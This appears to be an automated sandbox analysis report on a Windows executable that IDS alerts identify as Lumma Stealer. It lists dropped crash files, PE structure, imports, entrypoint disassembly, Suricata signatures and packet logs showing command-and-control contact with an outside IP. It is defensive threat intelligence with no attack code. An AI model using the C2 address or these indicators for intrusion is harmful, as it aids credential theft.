SHA1:	F1E523D2E9A44FD98CECBF538F79F0DA36354D47
SHA-256:	BA2D559C8D8E1EEAD89D04225E8415BB817854810DA9DD4B2A80EE08BF97277C
SHA-512:	DD10024F31321C6A71510024A08BC6CD26342AB2E05EB3293E0936A6AFE5699EC114D77B5156CC8FC907F40052148EB6CC8F868A7DAF9C19B43D130BA2E2BEDA
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.8.0.4.1.1.3.5.3.7.8.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.8.0.4.1.2.4.7.8.7.9.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.9.c.4.5.9.4.-.b.a.1.2.-.4.6.c.5.-.b.c.3.6.-.d.9.a.d.e.0.7.1.4.d.8.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.0.f.e.2.0.0.-.0.2.d.3.-.4.9.9.a.-.a.5.f.4.-.a.5.1.1.a.a.3.5.a.4.d.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.P.l.v.B.k.g.4.a.j...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.2.c.-.0.0.0.1.-.0.0.1.4.-.e.c.4.d.-.d.7.f.6.6.5.6.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.6.1.a.1.d.7.f.6.c.8.8.9.3.9.d.d.2.1.4.4.f.5.0.e.9.3.8.0.0.b.0.0.0.0.f.f.f.f.!.0.0.0.0.4.2.7.0.1.9.3.f.1.a.3.b.2.a.8.5.7.c.4.f.4.7.c.e.0.9.3.2.c.6.6.e.0.1.1.4.a.f.1.5.!.D.P.l.v.B.k.g.4.a.j...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE346.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 9 07:13:32 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	107558
Entropy (8bit):	2.1716347109108844
Encrypted:	false
SSDEEP:	384:jSMdbviSTj4sTBK7s7u4F1nCjN87/xxvXL8qkThBdAY7gSxkP+DgFQPsALyX9uz6:ju5sTBK7s7HZ6AYO9fnp
MD5:	136066A62D74C211D3DD2E0E22318505
SHA1:	811B01066DCD11EEDBA0D6CB7811E1056BC3DAD4
SHA-256:	4E5733C84158CD9D2BC6FD5B8D3015D6866DE77200E21DFD798B24A3170D4714
SHA-512:	0371D0E833A4D02B0F6E48ADC5CA26E849225051D8C6E5C680D10A6EEC000A40BA83700E2A63315D0F702A67CCE80652CCCA731E4CF71D040D80FA7217A0FCC2
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........w.g........................p...............h$......$....N..........`.......8...........T...........pE...^...........$...........&..............................................................................eJ......p'......GenuineIntel............T.......,....w.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6B2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8422
Entropy (8bit):	3.6969501852354227
Encrypted:	false
SSDEEP:	192:R6l7wVeJM5mP6Fe+y6Y95SU9dfZPgmfxKBhBOpDM89bDwsf0sP5Bm:R6lXJM5W6Dy6YDSU9DPgmfxKBhBqDDfI
MD5:	B245DC0570D21B78E6FEE2E7D71F8FA0
SHA1:	E2F455D88976C9FA411B9CFE2738A1B6F80EC2EB
SHA-256:	63629122FC18BA8B3E0B3C1CFDB1A385D49CB423E718E3DCAEB64255A6DD1000
SHA-512:	2105EAB4B1699B7CCE0E94318D93E1EA2E433027D2A5CB4F94DDCEE5A7DD54D7845903A8264AD06923E90AD53053C687C031D2494075EE763F461EEAB372C365
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.0.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6F2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4724
Entropy (8bit):	4.4747754567650135
Encrypted:	false
SSDEEP:	48:cvIwWl8zsDtJg77aI9roWpW8VYMYm8M4JP4940xO3FUUC+q8vw40xOBJzEM4tJ4X:uIjfDI75B7VcJCcCKsAJK43d
MD5:	21430094143D09A3F0320BE18AA71A97
SHA1:	E97A7F22B5603FA99CE05F86870667232DB41C73
SHA-256:	02CD1A6B015F4944C04936BAEC10E90174537715AB95BBCB230593B2A87E7F65
SHA-512:	1D3A911D27E1D3978798C9656FDA0C533E7D12438EFF55C190CEB0C2C49DD7BC232AD3D4C711F3155EE2B2EFB03DF8D293CCA3789EDD7BDFF60F802F2EF97C0D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="668056" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465422158561482
Encrypted:	false
SSDEEP:	6144:YIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNfdwBCswSbqD:NXD94+WlLZMM6YFHF+qD
MD5:	063BB636E63398917607D7672341108F
SHA1:	336D8EA8AAB59CFE58BE99C8D68FF614027C80CE
SHA-256:	08AC2221610E95A5FA03218CE0116949C832C6A6D1E2153BEDB276697F96DF10
SHA-512:	05FB7399B41D8F268A10A01DD46B0CC01D93E7548D44FC4BDFB02083C8AEA29C7B3008522FC89FDD5B13C5CF7FF52AC902E8E6A7A18955F2A36E0730B72D7E85
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm*,..eb..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.546840494381384
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DPlvBkg4aj.exe
File size:	450'048 bytes
MD5:	055bf072e4fa602afb77f598390a4dd6
SHA1:	4270193f1a3b2a857c4f47ce0932c66e0114af15
SHA256:	919c790858137accb667129e41d2f2faef350df995c80130b2b866837ff93235
SHA512:	09b1eeb68623c981cf85c25b3db9202e2d2b32a2a1734338cbfaa7ca4dc1443ef6eda72dac3e8f8c4c690fd6f91125e5ca1ecd55c831d313eac383bf96b687b3
SSDEEP:	6144:z6ULT5v6ssksnYqEKT5K1MVLQ9WcIdvaUmGNT6J:xTAsjfg41MlcIdT
TLSH:	B0A46D52B2FA3C18FA7747328E2995E4261FBDF1CE7C625E6114769F08B2972C123742
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A].. 3.. 3.. 3..r... 3..r... 3..r... 3...H.. 3.. 2.. 3..r... 3..r... 3..r... 3.Rich. 3.................PE..L......e...........

File Icon


Icon Hash:	738733b18b9b93e4

Static PE Info

General

Entrypoint:	0x40164d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6505D01E [Sat Sep 16 15:56:14 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	fd9568248eaffda6229623eb6f3f5b6d

Entrypoint Preview

Instruction
call 00007F18987FEC1Ah
jmp 00007F18987FA7BDh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0044B8F8h], eax
mov dword ptr [0044B8F4h], ecx
mov dword ptr [0044B8F0h], edx
mov dword ptr [0044B8ECh], ebx
mov dword ptr [0044B8E8h], esi
mov dword ptr [0044B8E4h], edi
mov word ptr [0044B910h], ss
mov word ptr [0044B904h], cs
mov word ptr [0044B8E0h], ds
mov word ptr [0044B8DCh], es
mov word ptr [0044B8D8h], fs
mov word ptr [0044B8D4h], gs
pushfd
pop dword ptr [0044B908h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0044B8FCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0044B900h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0044B90Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0044B848h], 00010001h
mov eax, dword ptr [0044B900h]
mov dword ptr [0044B7FCh], eax
mov dword ptr [0044B7F0h], C0000409h
mov dword ptr [0044B7F4h], 00000001h
mov eax, dword ptr [0044A004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0044A008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000A0h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x48a2c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb9000	0x200e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x47000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4515b	0x45200	aa99689d06849c9ba9804169e5a4b2c6	False	0.8056587646925859	data	7.413991654677546	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x47000	0x2310	0x2400	3dc48e2326190a9372a359277a57e5a0	False	0.3657769097222222	data	5.486116366219771	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4a000	0x67f7c	0x1800	c13badb4b95b299bbebca5b7e49487d2	False	0.3369140625	data	3.349415407696629	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.woy	0xb2000	0x53e5	0x4800	f9debe3f07be68533bf0295e3d2ba68a	False	0.002224392361111111	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.togazog	0xb8000	0x15a	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xb9000	0x200e8	0x20200	b32c70d0c90038515731761b5f3c2202	False	0.33114968385214005	data	4.391555304248858	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_CURSOR	0xd0600	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	0.4276315789473684
RT_CURSOR	0xd0748	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	0.7368421052631579
RT_CURSOR	0xd0878	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.06130705394190871
RT_CURSOR	0xd2e48	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.31023454157782515
RT_ICON	0xb9b70	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.27425373134328357
RT_ICON	0xbaa18	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4187725631768953
RT_ICON	0xbb2c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.5299539170506913
RT_ICON	0xbb988	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.5765895953757225
RT_ICON	0xbbef0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.420850622406639
RT_ICON	0xbe498	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.49385245901639346
RT_ICON	0xbee20	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.499113475177305
RT_ICON	0xbf2f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	0.3344882729211087
RT_ICON	0xc0198	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.39666064981949456
RT_ICON	0xc0a40	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	0.3888248847926267
RT_ICON	0xc1108	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.3959537572254335
RT_ICON	0xc1670	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.22136929460580912
RT_ICON	0xc3c18	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.24765478424015008
RT_ICON	0xc4cc0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.28114754098360656
RT_ICON	0xc5648	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.3120567375886525
RT_ICON	0xc5b28	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.3307569296375267
RT_ICON	0xc69d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4611913357400722
RT_ICON	0xc7278	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.5282258064516129
RT_ICON	0xc7940	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.5469653179190751
RT_ICON	0xc7ea8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.3025328330206379
RT_ICON	0xc8f50	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.3008196721311475
RT_ICON	0xc98d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.3528368794326241
RT_ICON	0xc9da8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.28171641791044777
RT_ICON	0xcac50	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.36597472924187724
RT_ICON	0xcb4f8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.3738479262672811
RT_ICON	0xcbbc0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.36921965317919075
RT_ICON	0xcc128	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.2598547717842324
RT_ICON	0xce6d0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.27790806754221387
RT_ICON	0xcf778	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.28524590163934427
RT_ICON	0xd0100	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.32358156028368795
RT_STRING	0xd3eb8	0x4c4	data	0.44344262295081965
RT_STRING	0xd4380	0x15e	data	0.5114285714285715
RT_STRING	0xd44e0	0x7d4	data	0.4241516966067864
RT_STRING	0xd4cb8	0x7b0	data	0.42327235772357724
RT_STRING	0xd5468	0x5f8	data	0.4443717277486911
RT_STRING	0xd5a60	0x6b6	data	0.43364377182770664
RT_STRING	0xd6118	0x66a	data	0.438489646772229
RT_STRING	0xd6788	0x6fa	data	0.4316909294512878
RT_STRING	0xd6e88	0x754	data	0.4253731343283582
RT_STRING	0xd75e0	0x422	data	0.4735349716446125
RT_STRING	0xd7a08	0x668	data	0.4329268292682927
RT_STRING	0xd8070	0x80e	data	0.4146459747817653
RT_STRING	0xd8880	0x668	data	0.4274390243902439
RT_STRING	0xd8ee8	0x1fe	data	0.49411764705882355
RT_ACCELERATOR	0xd05e0	0x20	data	1.15625
RT_GROUP_CURSOR	0xd0730	0x14	data	1.15
RT_GROUP_CURSOR	0xd2e20	0x22	data	1.0588235294117647
RT_GROUP_CURSOR	0xd3cf0	0x14	data	1.25
RT_GROUP_ICON	0xbf288	0x68	data	0.7115384615384616
RT_GROUP_ICON	0xd0568	0x76	data	0.6779661016949152
RT_GROUP_ICON	0xc5ab0	0x76	data	0.6779661016949152
RT_GROUP_ICON	0xc9d40	0x68	data	0.7211538461538461
RT_VERSION	0xd3d08	0x1b0	data	0.5810185185185185

Imports

DLL

Import

KERNEL32.dll

GetNumaNodeProcessorMask, SetDefaultCommConfigA, SearchPathW, SetThreadContext, DebugActiveProcessStop, CreateProcessW, InterlockedIncrement, GetEnvironmentStringsW, CancelWaitableTimer, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, GetModuleHandleW, GetCurrentThread, GetDateFormatA, SetProcessPriorityBoost, GlobalAlloc, LoadLibraryW, GetConsoleAliasW, GetVolumePathNameA, GetStartupInfoW, GetShortPathNameA, GetStartupInfoA, SetLastError, GetProcAddress, GetAtomNameA, LoadLibraryA, UnhandledExceptionFilter, DeleteTimerQueue, AddAtomA, FindAtomA, FoldStringA, OpenFileMappingW, FindFirstVolumeW, GetModuleHandleA, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetLastError, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetStdHandle, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, CreateFileA, CloseHandle, RaiseException

USER32.dll

GetProcessDefaultLayout

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T08:13:26.009314+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.112.1	443	TCP
2025-01-09T08:13:26.695806+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.112.1	443	TCP
2025-01-09T08:13:26.695806+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.112.1	443	TCP
2025-01-09T08:13:27.163810+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.112.1	443	TCP
2025-01-09T08:13:27.605817+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	104.21.112.1	443	TCP
2025-01-09T08:13:27.605817+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.112.1	443	TCP
2025-01-09T08:13:28.296133+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.112.1	443	TCP
2025-01-09T08:13:28.914230+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49732	104.21.112.1	443	TCP
2025-01-09T08:13:29.507462+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.112.1	443	TCP
2025-01-09T08:13:30.973085+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.112.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 08:13:25.522353888 CET	49730	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:25.522383928 CET	443	49730	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:25.522473097 CET	49730	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:25.528297901 CET	49730	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:25.528316975 CET	443	49730	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:26.009150028 CET	443	49730	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:26.009314060 CET	49730	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:26.012031078 CET	49730	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:26.012048960 CET	443	49730	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:26.012273073 CET	443	49730	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:26.057714939 CET	49730	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:26.064280033 CET	49730	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:26.064296961 CET	49730	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:26.064363003 CET	443	49730	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:26.695818901 CET	443	49730	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:26.695913076 CET	443	49730	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:26.696022034 CET	49730	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:26.698136091 CET	49730	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:26.698164940 CET	443	49730	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:26.708389044 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:26.708415031 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:26.708508015 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:26.708802938 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:26.708813906 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.163707018 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.163810015 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.165425062 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.165435076 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.165640116 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.182190895 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.182296038 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.182321072 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.605813026 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.605854034 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.605885983 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.605900049 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.605916977 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.605947971 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.605962038 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.605967999 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.605998993 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.606009960 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.606015921 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.606057882 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.606255054 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.606404066 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.606443882 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.606451035 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.610615969 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.610666990 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.610672951 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.651454926 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.692436934 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.692634106 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.692661047 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.692688942 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.692696095 CET	443	49731	104.21.112.1	192.168.2.4
Jan 9, 2025 08:13:27.692738056 CET	49731	443	192.168.2.4	104.21.112.1
Jan 9, 2025 08:13:27.692744970 CET	443	49731	104.21.112.1	192.168.2.4
